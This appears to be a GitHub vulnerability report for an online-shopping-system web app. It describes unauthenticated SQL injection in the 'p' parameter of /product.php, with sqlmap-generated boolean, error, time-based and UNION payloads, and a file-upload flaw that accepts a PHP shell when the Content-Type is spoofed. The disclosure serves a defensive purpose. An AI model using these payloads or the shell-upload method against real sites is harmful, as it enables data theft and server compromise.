SQL Injection & affected by Arbitrary File Upload
LoveCppp opened this issue · 0 comments
LoveCppp commented
SQL Injection
The online-shopping-system is vulnerable to un-authenticated error/boolean-based blind & error based SQL Injection attacks.
The p parameter on the /product.php page does not sanitize the user input, an attacker can extract sensisitive data from the underlying MySQL Database.
Poc's
SQLMAP PAYLOADS
p parameter on the /product.php page
pocs
GET parameter 'p' is vulnerable. Do you want to keep testing the others (if any)
? [y/N]
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) re
quests:
---
Parameter: p (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=72 AND 2037=2037
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (FLOOR)
Payload: p=72 AND (SELECT 1432 FROM(SELECT COUNT(*),CONCAT(0x7178707671,(SEL
ECT (ELT(1432=1432,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=72 AND (SELECT 2289 FROM (SELECT(SLEEP(5)))LMdY)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: p=72 UNION ALL SELECT CONCAT(0x7178707671,0x4b71516d647848537741636
571634e5a416a6a7a716367744d47654778554952467778625161716f,0x716b6a6a71),NULL,NUL
L,NULL,NULL,NULL,NULL,NULL-- -
---
[20:26:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
affected by Arbitrary File Upload
affected by Arbitrary File Upload at add_products line 22,Only verified Content-Type,so ,can modify Content-Type:
image/jpeg
filepath is ../product_images/1635249699_shell.php